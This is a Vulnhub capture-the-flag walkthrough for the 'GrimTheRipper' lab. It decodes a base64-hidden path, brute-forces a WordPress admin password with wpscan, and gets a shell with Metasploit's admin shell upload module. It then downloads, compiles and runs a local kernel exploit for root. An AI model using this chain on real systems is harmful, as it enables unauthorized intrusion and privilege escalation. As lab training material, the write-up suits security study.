Vulnhub – GrimTheRipper Walkthrough

We scan the box with nmap -A -T4 -p- -vv

We use dirb /usr/share/dirb/wordlists/big.txt

When viewing the source on the path we get this:

THpFd01UQXhNREU9IHRyeSBoYXJk, and when decoding it as base64 we get:

LzEwMTAxMDE= try hard, then decoding LzEwMTAxMDE again gave us:

/1010101, a new path. When viewing it, it's a WordPress path.
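The two decoding steps above, as an added example that is not part of the original walkthrough: a Python helper that peels nested base64 layers, skips surrounding plain text such as "try hard", and restores a dropped "=" pad. The function names are assumptions made for this illustration.

```python
import base64
import binascii
import re
import string

# A candidate token: 8+ characters of the base64 alphabet, optional padding.
TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
PRINTABLE = set(string.printable.encode())


def try_decode(token):
    """Return the decoded text if token is base64 of printable ASCII, else None."""
    stripped = token.rstrip("=")
    if len(stripped) % 4 == 1:  # no valid base64 string has this length
        return None
    padded = stripped + "=" * (-len(stripped) % 4)  # restore dropped padding
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or any(b not in PRINTABLE for b in raw):
        return None  # decodes to binary junk, so it was not an encoded hint
    return raw.decode("ascii")


def peel_layers(text, max_depth=10):
    """Follow the first decodable token in each layer; return every layer seen."""
    layers = [text]
    for _ in range(max_depth):
        decoded = None
        for match in TOKEN_RE.finditer(layers[-1]):
            decoded = try_decode(match.group())
            if decoded is not None:
                break
        if decoded is None:
            break  # nothing left that decodes to readable text
        layers.append(decoded)
    return layers


if __name__ == "__main__":
    # The string from the page source quoted in the walkthrough.
    for depth, layer in enumerate(peel_layers("THpFd01UQXhNREU9IHRyeSBoYXJk")):
        print(depth, layer)
```

The printable-ASCII check is what stops the loop at /1010101: that string is itself valid base64, but it decodes to non-text bytes.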

Running wpscan to enumerate the usernames found the username admin, so we can try to brute force it:

wpscan --url -U admin -P /root/pass/rockyou.txt -v

We got the password Password@123, but when trying to log in we get directed to, so we are going to try Metasploit:

use exploit/unix/webapp/wp_admin_shell_upload

set TARGETURI /1010101/wordpress

set rhosts

set password Password@123

set username admin

A simple cat /etc/issue gave us Ubuntu 12.04.5 LTS, and using searchsploit we get:

Exploit 37292.c

Then we transfer the exploit to the target machine using python -m SimpleHTTPServer 80, and on the target machine in the /tmp folder we do wget 37292.c

We compile it using gcc -o script 37292.c and then we run it with ./script, and we got ROOT. That's it, no flag to capture.
